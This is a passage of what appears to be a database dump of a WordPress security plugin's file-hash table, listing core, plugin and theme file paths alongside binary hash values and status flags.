:��/<6`�N�[\"L�h,���[\Z6��','',0,'?'),('Ҿ�x�P;�+2�/�?','wp-includes/wp-includes/js/jquery/ui/effect-shake.min.js',0,'1�̎�X�!��-�U��','1�̎�X�!��-�U��','�.��,�e=~[�Y�p�x�\"��o�?v��#��','',0,'?'),('p9}dZBw�NN�7`m','wp-content/plugins/wordpress-seo/admin/class-meta-columns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r�n4`L���','�?q`^�1�ڍgqo����k�,�:��f���','',0,'?'),('$�P�`��\0g�X�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yF“\\����2���','2k�s��\\>��RI:nH�ȿDm�!zz���','',0,'?'),('&�������͂|d8�','wp-includes/blocks/pattern.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a�v\"�.%T��','�~\r�X�IRF�AY���]A��oab���3��','',0,'?'),('\'^	�} -R�Ȗ4�','wp-content/plugins/wp-cerber/languages/wp-cerber-de_CH.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�kmf--�=��?	ox','���v�Ĭ�ኾ+]^�CR.ؠ�$b�Cf�','',0,'?'),('+��\nI䆪��f�Z�','wp-content/themes/hitmag/inc/kirki/modules/selective-refresh/class-kirki-modules-selective-refresh.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B���2X��A�jĺ��','��ׇ��z�������0{H�<�����=���\Z','',0,'?'),('-��c�<���@�VsZ�','wp-includes/js/api-request.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9����߿G7p6{�g','�d�6Q\\����f�:�����G`��j1V�','',0,'?'),('?����?���y\0l','wp-content/plugins/wordpress-seo/src/exceptions/addon-installation/addon-activation-error-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1>\Z�={k+��\"��','���Z-C�m�+��sZ��#�\Z�æ��\r��','',0,'?'),('^����}\\� �Q�','wp-content/plugins/wordpress-seo/src/presenters/open-graph/description-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8dA���d�/���','0s�b�w��^�`�&\0�R��h6\0o	�G�+e','',0,'?'),('_��z���9�݀D:��','wp-includes/blocks/media-text/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��6S�Vm�ȓ=&���','D7TP��g�R��0��Ɋ�o�c���:�!k�A(','',0,'?'),('��<_zˁ���>㝄','wp-includes/wp-includes/random_compat/random_bytes_dev_urandom.php',0,'��d�����\ZHr�','��d�����\ZHr�','\nDfdvP�f�On:����a��г‘���X�','',0,'?'),('��|40D�/�b%_�d','wp-content/plugins/wp-smushit/app/assets/css/smush-rd.min.css.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ˌ��|�BL�8����','Щj$y�(�t�O�PB���*����2�#jc�b�','',0,'?'),('�Lo��˃�Zh�{�','wp-content/plugins/wordpress-seo/src/helpers/meta-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=8V(�c�Jl�CW��','u���FB�⺴�����|�i�䄃�>�i]��M','',0,'?'),('�y���!�\0pZ�[A','wp-includes/js/mediaelement/mediaelement-and-player.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>�����5��V�','yG#��\n��7�ڌ6�(C�����h���y�','',0,'?'),('��E�ȖqȊ?2�H�','wp-includes/js/dist/api-fetch.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������~��+�','�};ny��k��H�T�d�\n�����jA�}','',0,'?'),('�5pު�m�\Z��','wp-includes/blocks/separator/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�QHOM�W��Y\0�Q�','UU�-����V8�\n�	��p�P��Z��S�','',0,'?'),('���<���|Q���','wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-metabox.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\ZM��C�5O��i�>','p?S�K@�Se������۷���$���ѯ','',0,'?'),('�#U���d��,1�','wp-content/plugins/wordpress-seo/src/integrations/front-end/backwards-compatibility.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d�ܳg\n�i]��R�','&AHo�ns��?̢\\}F�x7g[^����k��Ɉ','',0,'?'),('ֻE\n�<�B�[�,','wp-includes/class-wp-ajax-response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QnK\nθfޞX���	�','�T�#t��E��ȴ|TPUJ����\0�\r�U�O�','',0,'?'),('��Y�Ab�))�O�s','wp-includes/wp-includes/sodium_compat/src/SodiumException.php',0,'�HDf��ae���z��R','�HDf��ae���z��R','㶜\\��L>L�N-@G\'��tmG��i��kR߮g\0','',0,'?'),('�����\n���V7	','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/AppendStream.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	r�\Z���_�s=+\r_','��ǝw��7�:���*�B,]{�r<.�>��','',0,'?'),('���(l�8y\n&','wp-includes/wp-includes/css/dist/editor/style.min.css',0,'հv��}�Ifs��>�','հv��}�Ifs��>�','�J����Tc68H�\Z�s\'9]�6�p���4d','',0,'?'),('�[�\0��Y[cM�{','wp-includes/css/dist/block-library/classic.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�ڛ���\nX;}�`9�','{0�x���^L,m�)˕^�~9��ɤ��6)ڻ�','',0,'?'),('�m��n9�F�6�','wp-admin/css/admin-menu-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nO��9���T�2�ڹ','e�Z�m#�tFM�F��ʱ#y*�jϏ��%','',0,'?'),('C<����8=靹FiD','wp-content/plugins/wp-fastest-cache/css/fonts/statics/flaticon.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','䓣Ǧ�w��$��L��','v�jy: �/�ӎ\n�K�*1:�}�-�FXK�g��','',0,'?'),(' �+Ĝmj�/�ԑ�','wp-content/plugins/wp-cerber/assets/flags/fj.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�qYJ��˥�Rӑ{��','�j^���f�~@z�PQ\ZŸF.�[tey4}�KVP�','',0,'?'),(')�M��^�ûoz�','wp-admin/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�ל�x>c������¢','�<\0Ѕҩ��هqU%��G��7r�\\�*��2J','',0,'?'),('.�c\r��xz�-�c=�','wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php',0,'Ջ}��B��H��71','Ջ}��B��H��71','��\"�beTb�$����׉�\n���~�ln��','',0,'?'),('/�\"C�EÚ7kH��','wp-includes/blocks/comments-title/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �]C�!�|A�JH\0��','��f )�Cھ�KG�\Z�C����ť L��p�','',0,'?'),('3!\'A\0���o���','wp-content/plugins/wp-smushit/core/modules/helpers/class-parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a*FY�4Vf޵�3X�','�����(4�40 #���N�o1�+?r�&�','',0,'?'),('4%�IH�O��ʰ�L','wp-includes/css/media-views.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Xh��S��r�5���2','��>�T�?8칹���։0v�c�0׿\0��b��','',0,'?'),('C�/�;)��ّ�o','wp-admin/js/comment.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	�\'v�\\�t\'�ӵ�','ku0��\\�V�{0�wZN%Y-�)������^`','',0,'?'),('H��~�\n��x����|','wp-includes/js/dist/token-list.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�Z�JЃ�lG_t�','�3�n�0��;Χ�s��M�y�``���r�','',0,'?'),('Lf�:���)��\n���','wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager-wp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Eٱ��uR����ܱ�]','���7�+y�6Ʉ/-�Ԗ0X.{���^�٨jh','',0,'?'),('P�Jto��g0���o�1','wp-content/plugins/wp-smushit/app/views/pro-features/meta-box-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ZD��yG�hqG��i','�R|�%�3����_ɾ�Ϸ��寊b�\Z�)8��e','',0,'?'),('S��v��]��$ů�','wp-content/plugins/wordpress-seo/src/presentations/indexable-home-page-presentation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���rZ�bظ m','D!��yWu�\nq\Z�����\ZK��܉H�*���D�','',0,'?'),('T�gslF��ʞ�Ly','wp-admin/js/set-post-thumbnail.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�P�N�H�9e�@I','e}#����n�q�J�rJ��Q<d��Z�K�4','',0,'?'),('a�@�WrQw��Z\n.�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ܑz�g<N��\n?o6f','���R����Eg�X3��JAc��!a�_��S{','',0,'?'),('h|��x鄒GLK1$','wp-content/plugins/wordpress-seo/src/presenters/bingbot-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n`6�\Zr�}���tU','�خ��vq͠��P�X[���+U�=���=�]��g','',0,'?'),('k\0U���4N���','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	Xy�nCN.�$6��','� #HAv����Ґ\\�G������%�Se�','',0,'?'),('z�|*6�S\\5��3','wp-content/plugins/wordfence/lib/wordfenceScanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X�عw$��','S�=�u���%T�M�\"��7�G�	�\"M(�','',0,'?'),('{mt+.\'\r���:�*','wp-includes/wp-includes/css/editor.min.css',0,'p^�,f�ޡ�����I{�','p^�,f�ޡ�����I{�','��i�4�j�v�J5�d���߲TP��L�/��7�','',0,'?'),('�9�T>�A\n�3��}�','wp-content/plugins/wordpress-seo/css/dist/filter-explanation-1851-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1+��RM�;�','�s�xX��Ϲ�|c���4��s�3x:��[','',0,'?'),('�Ʒ4�/�;����','wp-includes/wp-includes/js/dist/api-fetch.min.js',0,'B��p=(mV�2��_a','B��p=(mV�2��_a','G�y���л\r��7�5���d������R��','',0,'?'),('�\n$z�X�`�1Bw','wp-includes/js/tinymce/plugins/charmap/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\��5^����','[�B�\Z,;��j�fe�MU�j|)�rv��>U�F','',0,'?'),('��=b�6��hs���t','wp-admin/ms-themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:1R]	l�I��!#_J','7�E��H����Pu�����Z�b��G','',0,'?'),('��\'��FE�A�vQMv','wp-content/plugins/wordfence/lib/Diff/Renderer/Abstract.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>\r��5]xVI�\'�i�','��G��݅\'�!���Y�E�3��P5ad��M��','',0,'?'),('��I�����UzYWg!g','wp-includes/blocks/latest-comments/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�������\"','�>A?�<;���qn����RY(���	Z��L','',0,'?'),('�^�u[�p}`B��W1','wp-includes/blocks/table/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q������\n�٥�uS','�K�\"�K]*��H��,���Н1�[-�0���O��','',0,'?'),('���#�9�c�Z�-C�','wp-content/plugins/wp-smushit/app/assets/js/smush-react-webp.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��L�:�cVw@��8','�\rH�qo㒶 �]:0c�,h�O:?�,J����','',0,'?'),('��Nk��DR���ng#�','wp-includes/wp-includes/widgets/class-wp-nav-menu-widget.php',0,'�8x$�9�hQ&�','�8x$�9�hQ&�','n~��B�Ȳ���|�4�[�U�`\0�2�J۷�','',0,'?'),('ƍp�=Z\0�S_���$','wp-includes/blocks/cover/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y���)U\'��\'���n','k�à* v{�\0	S�\r���<�\'��ir��V�z','',0,'?'),('�k0B��a��`�','wp-includes/customize/class-wp-customize-nav-menu-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ǜ�\0�5��+�&̺WV','���owҏ]e|�K$��9rs�c�&�/��','',0,'?'),('ػȯ�S#���yj','wp-includes/wp-includes/sodium_compat/src/Core32/SipHash.php',0,'�5O&?��E�	��%','�5O&?��E�	��%','^%%�hT��,�����k2�Ȯn=n%:��','',0,'?'),('����^�cm]�s~','wp-content/plugins/wp-cerber/nexus/cerber-nexus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ޝ��j�[�ʒ\'���n','T��jd�,dB?��\\0�ٟU���+���','',0,'?'),('ܟ�ҿB∶����','wp-includes/js/dist/media-utils.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>�k�>KQ�*@[���','�y럁v}{,X�63��f�N6�7XYr#�Va��y','',0,'?'),('�-=Q�Cw�tnL�#','wp-content/plugins/wordfence/lib/wfBrowscap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\r�e.�����b��','�Hz�n���O�#�/�t�ɚ\"���U ���A�i�','',0,'?'),('�N�đG�����','wp-includes/wp-includes/sodium_compat/src/Core32/HSalsa20.php',0,'��/Dzx��ǂ��','��/Dzx��ǂ��','���,�����E���{��0/m�a�X�i���','',0,'?'),('͑�}�P��	0��7','wp-includes/blocks/code/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\JNPT-�7����]�','���<�/��lU0*ߥW�$V����vC]���4�','',0,'?'),('\n��O�_��;]/^��','wp-includes/images/down_arrow.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���V�~�o�YnG~_u','��h�8ɧ���p�u�{�9������J���','',0,'?'),('���D��(��\\�','wp-content/plugins/wp-cerber/assets/flags/hm.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�s���x�хeKJAF=','��\'Ą���I_W�6Ց�-��Pa�J{�>�n4~$','',0,'?'),('٩�\'~��mat�t','wp-content/themes/hitmag/js/jquery.magnific-popup.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�$Ȼ�����0bn','mS$^�|T�8�đ����=�ظ�l��F��`p�','',0,'?'),('ν�}�V�+�tB�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��꤀�x�٠�%�cl','N�8,�c����ae����Οi<5p$���','',0,'?'),('G_bc�.,]&���','wp-admin/js/image-edit.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#�0֟]�ѡ\r�3','[si���$�!߼�ƍ:o��\n:��G��E=�','',0,'?'),('Kv�$T�MR����=�','wp-includes/css/dist/edit-post/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��� �(�*��K\"�0','>`}MnӃ\'��\"!�a֗¡��yngxa!','',0,'?'),('J�*\\,R�ģ�}j','wp-includes/wp-includes/widgets/class-wp-widget-media.php',0,'�m�����O���\\��','�m�����O���\\��','�b�Z�r��A��{�_���d���5|','',0,'?'),('3�*�;i�2^����','wp-content/plugins/wordpress-seo/admin/views/tabs/social/twitterbox.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�u_��8�ky�Bj','9}�x�t�ӂ���M��OD���8�W���,�m~P�','',0,'?'),('O�ں�^�8�Kq���','wp-content/plugins/wordpress-seo/src/helpers/schema/language-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��S�t���I��H�','	�+���r?��V�Ns{����!�y���a�','',0,'?'),('[Wr\'��E��)�j�','wp-content/plugins/wordpress-seo/src/actions/indexing/indexable-indexing-complete-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1#���`R�?Z�','0q&o��0�P92�H\n��P\n=7濘R>kv','',0,'?'),('fMx���	�+9�U�','wp-admin/js/customize-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~V�(A����\nƨP','��0!(��}u��?f��`���o�G?|��\n�','',0,'?'),('f�[(.Զ�d�JB','wp-content/plugins/wordpress-seo/css/dist/admin-global-1851.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(3\r�ve����{SL�8','�^Q7?D�Ч�~��(Ux��W��\\���7�','',0,'?'),('l��g.N��\ZK\Z�-','wp-includes/wp-includes/js/tinymce/plugins/wpemoji/plugin.min.js',0,'9\'�Q8b�/����a�','9\'�Q8b�/����a�','�3t\\R>��_a��>�\0��|ՑVC�䦇OB','',0,'?'),('|m�\\��^�o�	��','wp-content/plugins/wp-fastest-cache/languages/wp-fastest-cache-zh_TW.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���v\0�������9','��kB�q ���RB��ˬ�ݹ�(��U�#�)�','',0,'?'),('}�/N�r%�]t��','wp-content/plugins/wordpress-seo/src/integrations/watchers/primary-term-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I:�W*���\"�\"��\0','�$�+��KE6�S�����N��ЬE�ũ�&�N','',0,'?'),('�&𐯧o]��3+�g','wp-includes/blocks/post-terms/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t�k�Cw�y�?A�a','J5�D�j�$�У��m�[��U�8�X�a\Z�','',0,'?'),('�%��\\��MA����','wp-admin/images/wordpress-logo-white.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��qP�C��-SPD�','e�4�E��?�&�DsA���ʬ�;�)@�Xɒ','',0,'?'),('����g��8Sg��y�','wp-content/plugins/wp-cerber/assets/flags/bn.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f>Kن����Ϭ','�k��Q�`K�e��{^�)�F\"�T*j����V�','',0,'?'),('�\0_P�P��Cx�14\0','wp-content/plugins/wordpress-seo/src/config/schema-types.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�PZ$��{u�YZ�8','\n�fŒ��D��y��q��~v\Z��V�]e�+�','',0,'?'),('�=�}C���i��HT','wp-admin/network/profile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�3���@%�c ','�\\H�.7���7QtUw�ݰAK,�$A��!��Lz','',0,'?'),('��g+������,c�','wp-includes/block-supports/colors.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^z��#���Q gꐭ','\\Ӛ�U�\r���,�m��W�����Hh��','',0,'?'),('̖�PRݒo�.̇�','wp-content/plugins/wordpress-seo/src/schema-templates/recipe-ingredients.block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e��Lٜ���K�%��','SY�?�iЌ�G�����o}y��\nHu�E~�','',0,'?'),('�g��I�!٭���_�','wp-includes/ms-blogs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0��_tp��\Zu\0���S','xٯղ�.�9]��گ\'m��!�+��K�o','',0,'?'),('���t�DX�m\0#�(�','wp-includes/customize/class-wp-customize-nav-menu-locations-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���_Ӏ�,L��~Y]�',':��J~��4��!Ѭͼz��&�x%b�j[]jz','',0,'?'),('��]/~���q��XŎE','wp-includes/js/jquery/ui/button.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ż�����;�QT��','��-�L��Ț?Mn{G���}��&�=Y��񼂷','',0,'?'),('�6���Ab���k�','wp-includes/wp-includes/class-wp-editor.php',0,'�s��\'+���������L','�s��\'+���������L','/%�k�\r<���&u�NKI�v���GrA��','',0,'?'),('�3������܎�J�','wp-includes/wp-includes/ms-blogs.php',0,'YYw_s簃@	DE�m','YYw_s簃@	DE�m','�~ۃG��,,?��0��v��f��UӧN��iK','',0,'?'),('����\Z~!�N����','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ÂX����4q���m�','�^3iL<��e��9U����w��;7B�8x�T�','',0,'?'),('\0HS�\r�Ѐ1X�@','wp-includes/wp-includes/css/dist/block-directory/style.min.css',0,'IF	�1�P�������','IF	�1�P�������','��hbAnIJ��\'��o�;~p%�Z$.\'����-4','',0,'?'),(';^3<���	r�&�r','wp-content/plugins/redirection/matches/from-notfrom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ư��i�Ά�n��xc','��ܑI��o�\r|��A:�9��L�c���8','',0,'?'),('\n���{�;@	m�=}','wp-includes/wp-includes/images/rss.png',0,'��[�(�.��*NZ�','��[�(�.��*NZ�','j�(-9��_��E-#�we�$�]o�01��u','',0,'?'),('6R͸�r4O�','wp-content/plugins/wp-cerber/assets/flags/sc.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���?>�g(�����','R+�FE��%h)e!�����O�jUd2�n g�','',0,'?'),('��eJ�\'U9�5�x','wp-includes/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php',0,'�V�*��F谯��<��l','�V�*��F谯��<��l','�®�R�l�U�����wz�ank��G�t�3�','',0,'?'),('4��NR�9U�7','wp-content/plugins/wordpress-seo/src/values/oauth/oauth-token.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�˲��X;���YD�Fx','\\~��n�8�m\"\0�ʈ�֯#yic^7��rZ\Z','',0,'?'),('B�@�R*G�xF4N}','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�_�?Sş\Z]�y�','�6��[-�,9YR�r�\rY\"-��an�6$�','',0,'?'),('E*A?\"S\0R=��H�','wp-content/plugins/wp-cerber/assets/flags/mq.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')U�����p��L�','qx	e���\\���<5@�G�յ\\?�-���	','',0,'?'),('R�\\�&��T	�|`','wp-includes/class-wp-user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']➵S�.��¯�C�','戦VV�l�W�#&�M�>���jØ�?�p��','',0,'?'),('\\G�h�oqcbռ��Y�','wp-content/plugins/wordpress-seo/src/services/health-check/ryte-reports.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɯK�xs�.��\'JSE','�;@�����a�X\\ʓ�O�Owwb0S��>','',0,'?'),('tt̸�T�.�*óU�','wp-content/plugins/wordfence/modules/login-security/views/page/role.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!|3�is:���y�',']F��ŀ�T��ݵ�*�b`u��n��9��\'(�','',0,'?'),('u�V��\'j��\Z�V','wp-includes/blocks/comment-template/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ⅽ���5��Z��1','��wˢ(�e�s�?c7�����R�`W���=mg�%','',0,'?'),('ynm�;�/�UsK	��','wp-includes/css/wp-embed-template-ie.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7{WP�L�{H���I�','\\aWq1��+��Я�o�L�Y\0�„K���%<','',0,'?'),('z���D�>��A�)�a','wp-content/plugins/wordpress-seo/inc/wpseo-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��A@��ŕ���.','���3-��$�¹��wm�jj⁥w�`@��[���','',0,'?'),('|�&;�r�Ls5��','wp-admin/includes/comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ZtC�*w�44��','ck �o}��vTf� �s�ݛfl3g6N�\Z�J','',0,'?'),('��ؤ��1�n��Ӕ�','wp-content/plugins/wordpress-seo/src/actions/importing/aioseo/aioseo-cleanup-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���l�\n\'�B��/�4','{�\\���\\���4����G����f�؉r�F�','',0,'?'),('���Ye�.�0s��','wp-admin/includes/class-wp-comments-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�굉i�J�*�f`�p','D��m�)�>�?e\Z Cu��	4��z�r���en','',0,'?'),('��,d$\\Zޟ^Wu�','wp-includes/blocks/buttons/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_\0,Q��E��˓��','�$-Ѱz[��ʾ�J+�����:�LD��I\n','',0,'?'),('�A�o\r�ZԔ_�t','wp-content/plugins/wordfence/views/waf/waf-uninstall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','񘅊��8��9a�','�svZ�����kr\r��܈D:auu����','',0,'?'),('��x���;C�QkkR�','wp-includes/wp-includes/class-wp-dependency.php',0,'���NV}��b.\'�5m','���NV}��b.\'�5m','�[�4M�,�4�ܓ�x�wBB̕=Bg��}I�l�','',0,'?'),('��I/���\n	�F','wp-content/plugins/wordpress-seo/src/presentations/archive-adjacent-trait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Vb���;��D��d�','hfEx�\'nS�m�Ҹ�ӋƠ����1�=','',0,'?'),('��\'-�p�-��f�','wp-admin/css/l10n-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xmǏ|�s���A�',']��%FL�\nI�L��l���f426G��\'��','',0,'?'),('��j�ֹJ����0Y','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�0W\"F)����8O�','�5���)&��BoK]���ػ��rm`%��h�O','',0,'?'),('�&d��-V�f��\Z_�l','wp-content/plugins/wordpress-seo/src/schema-templates/recipe-name.schema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z3_�o�fq�d��','|]]����a~��O��-x�Mp(�K�\"��','',0,'?'),('��p�Џ���X�F','wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-code.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����jm��!�f��','x�i�-���	ㅟ�ЖeK�C鉼4y1d�\'�','',0,'?'),('�Nk�E���)�Ŋ��','wp-content/plugins/wp-fastest-cache/images/dollar.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����u�W�P��ʧ�','nfx��\n�[[�T���J������Y��J','',0,'?'),('�\"�<	i�t��&�','wp-admin/css/colors/modern/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d�:���KH#<VC�g�','��G�O�m~��+��+��S\Z�;8vs\"^\Z��#�','',0,'?'),('��R�a~�j,rVO','wp-includes/style-engine/class-wp-style-engine-css-declarations.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�J�Ӂs�>�y\'','O�o6#�2	P.ԀO&����w�99','',0,'?'),('��0wc`��78��M','wp-includes/blocks/gallery/theme-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2��yГ��L+��5�	','���z��W���&G��b���`xp�d��','',0,'?'),('	ߊ�A�\r��#\"!�','wp-content/plugins/redirection/database/schema/220.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jM�\Z�A~�s.�H�','u��~���{�.�?��!��ytK}��','',0,'?'),('��PC���I徥��','wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php',0,'����v�\rs*�\\�','����v�\rs*�\\�','��O�Z=�<�3S�t�Q����_�u;�	m8','',0,'?'),('*ԅt��hEc�W�h^','wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/H.php',0,'�ăd��O�[�S\nc\0','�ăd��O�[�S\nc\0','^o�&[�l����2Zg/�?>��P~C��Iȗ','',0,'?'),('/���Vل4�(ze�','wp-content/plugins/wp-cerber/assets/flags/lt.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�`�A�1y���Ŗu','~��J�0�1��U��T�d�3�~�4�A�','',0,'?'),('A�񟧶��f*k���','wp-includes/blocks/navigation/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h\0���s������2','X���x�􂉝7��|E���Zu��4�9�','',0,'?'),('K����TW�.��(�I','wp-content/themes/hitmag/inc/kirki/assets/images/1c.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}ܭ���Aa�~R�','��9�&ίF�د��6�\Z�.���S����%6At','',0,'?'),('L����5M�SYK��','wp-content/plugins/wordpress-seo/admin/formatter/class-term-metabox-formatter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z�77��c�Z�','$6�}��V!��&N�T��4�&�䎲�o�����9','',0,'?'),('L��bP�-I׭1f�','wp-includes/theme-compat/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s��<w�!��1','q�2�յ��